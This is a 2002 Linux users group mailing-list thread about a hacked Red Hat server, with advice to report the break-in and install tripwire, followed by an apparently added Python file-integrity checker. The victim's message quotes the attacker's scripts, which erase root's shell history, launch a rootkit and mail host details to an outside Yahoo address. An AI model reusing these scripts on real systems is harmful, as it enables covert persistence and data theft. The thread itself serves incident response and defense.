[lug] i got hacked

Harris, James James_Harris at maxtor.com
Fri Apr 19 09:27:27 MDT 2002


One final piece of advice when you rebuild, install tripwire.  All of the
firewall recommendations, combined with wrappers, log sentry (log check)
will help prevent it from happening again, but tripwire will let you know if
it _does_ happen again.

Just another layer of paranoia.


-----Original Message-----
From: D. Stimits [mailto:stimits at idcomm.com] 
Sent: Thursday, April 18, 2002 18:38
To: lug at lug.boulder.co.us
Subject: Re: [lug] i got hacked


j davis wrote:
> 
> yahoo,
> i got hacked and they're sending info to a yahoo 
> account.....ryz_ro at yahoo.com look below....

Hope you actually sent it to abuse at yahoo.com, this one went to BLUG. Do be
certain to mention it was a criminal break-in, and that logs and data should
be preserved for police inquiries.

D. Stimits, stimits at idcomm.com

> 
> >From: "j davis" <davis_compz at hotmail.com>
> >Reply-To: lug at lug.boulder.co.us
> >To: lug at lug.boulder.co.us
> >Subject: [lug] i got hacked
> >Date: Thu, 18 Apr 2002 21:44:09 +0000
> >
> >
> >i have a box at a place i do contract work about 2 days a month. 
> >today i could not ssh to it. so i went on site and discovered i got 
> >hacked...like a dummy i didn't have tcp wrappers on or a firewall . i 
> >think they exploited wu-ftpd ..i use redhat 7.1 with wu-ftpd 
> >2.6.1-20...i haven't got around to upgrading yet.
> >anyway here is what i found in /etc/rc3.d/S52remote
> >
> >#!/bin/sh
> >
> >rm -rf /root/.bash_history
> >ln -s /dev/null /root/.bash_history
> >
> >cd /dev
> >./ryz -f ./s
> >/etc/rc.d/init.d/sshd stop
> >cd /
> >
> >/usr/bin/trimite
> >
> >then here is /usr/bin/trimite
> >
> >#!/bin/sh
> >
> >echo "* Info : $(uname -a)" >> /tmp/info
> >echo "* Hostname : $(hostname -f)" >> /tmp/info
> >echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> /tmp/info
> >echo "* Uptime : $(uptime)" >> /tmp/info
> >echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> /tmp/info
> >echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> /tmp/info
> >echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> /tmp/info
> >echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> /tmp/info
> >echo "* Spatiu Liber: $(df -h)" >> /tmp/info
> >echo "* Ping la Yahoo: $(ping -c3 yahoo.com)" >> /tmp/info
> >echo "* Password: $(wc /etc/passwd -l)" >> /tmp/info
> >echo "* Portul rootkitului este 25897" >> /tmp/info
> >cat /tmp/info | mail -s "root dupa reboot" ryz_ro at yahoo.com
> >rm -f /tmp/info
> >
> >so, netstat says i have something listening on 25897...what should i 
> >do?! never been hacked before....i already turned off ftp and turned 
> >on tcp wrappers.
> >
> >help please
> >jd
_______________________________________________
Web Page:  http://lug.boulder.co.us
Mailing List: http://lists.lug.boulder.co.us/mailman/listinfo/lug
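The tripwire recommendation above is about detecting changes like the ones j davis found: a new init script in /etc/rc3.d, a new binary in /usr/bin, and /root/.bash_history replaced by a symlink to /dev/null. The following is an added example (not from the thread, and not tripwire's own code) of the core of such a file-integrity check: take a baseline of hashes, modes and symlink targets, store it, and diff against a later snapshot. The watched directory list and the constructed sample tree (built in a temporary directory, with placeholder file contents) are assumptions for the demonstration; a real deployment would keep the baseline on read-only or off-host storage, because, as the reply notes, a baseline is only worth taking on a freshly rebuilt system.

```python
#!/usr/bin/env python3
"""Minimal tripwire-style integrity check (added example, not from the thread)."""
import hashlib
import json
import os
import stat
import tempfile

# Directories to watch, relative to the root being checked (assumption for the demo;
# on a real host these would be absolute paths such as /etc, /usr/bin, /root).
WATCH_DIRS = ["etc/rc3.d", "usr/bin", "root"]


def _fingerprint(path):
    """Describe one entry: symlinks by target, regular files by hash+mode.

    Device nodes and other special files are recorded by type only, so the
    checker never tries to read e.g. /dev/zero if a watched tree contains it.
    """
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        return {"type": "symlink", "target": os.readlink(path)}
    if not stat.S_ISREG(st.st_mode):
        return {"type": "special", "mode": oct(st.st_mode & 0o7777)}
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return {"type": "file", "sha256": h.hexdigest(), "mode": oct(st.st_mode & 0o7777)}


def build_baseline(root, watch_dirs=WATCH_DIRS):
    """Walk the watched directories (not following symlinks) and fingerprint every entry."""
    baseline = {}
    for d in watch_dirs:
        top = os.path.join(root, d)
        if not os.path.isdir(top):
            continue
        for dirpath, _dirs, files in os.walk(top, followlinks=False):
            for name in files:
                full = os.path.join(dirpath, name)
                baseline[os.path.relpath(full, root)] = _fingerprint(full)
    return baseline


def save_baseline(baseline, path):
    """Persist the baseline as JSON; in practice write it to read-only/off-host media."""
    with open(path, "w") as f:
        json.dump(baseline, f, indent=2, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def compare(baseline, current):
    """Return added, removed and changed paths between two snapshots."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p])
    return {"added": added, "removed": removed, "changed": changed}


def demo():
    """Constructed scenario mirroring the thread's findings: baseline a clean tree,
    then add an rc3.d script and a /usr/bin file and swap .bash_history for a
    symlink to /dev/null. File contents are placeholders, not the real scripts."""
    root = tempfile.mkdtemp(prefix="fim-demo-")
    for d in WATCH_DIRS:
        os.makedirs(os.path.join(root, d))
    bash_hist = os.path.join(root, "root", ".bash_history")
    with open(bash_hist, "w") as f:
        f.write("ls\n")
    with open(os.path.join(root, "etc", "rc3.d", "S55sshd"), "w") as f:
        f.write("#!/bin/sh\n# placeholder init script\n")
    baseline_path = os.path.join(root, "baseline.json")
    save_baseline(build_baseline(root), baseline_path)

    # Post-compromise state (constructed placeholders only).
    with open(os.path.join(root, "etc", "rc3.d", "S52remote"), "w") as f:
        f.write("#!/bin/sh\n# placeholder\n")
    with open(os.path.join(root, "usr", "bin", "trimite"), "w") as f:
        f.write("#!/bin/sh\n# placeholder\n")
    os.remove(bash_hist)
    os.symlink("/dev/null", bash_hist)

    return compare(load_baseline(baseline_path), build_baseline(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Running the demo reports S52remote and trimite as added and .bash_history as changed (regular file became a symlink), which is exactly the signal a check like this would have raised on the box in the thread; the hash comparison also catches a trojaned binary whose size and mtime were restored, which a plain `ls -l` review would miss.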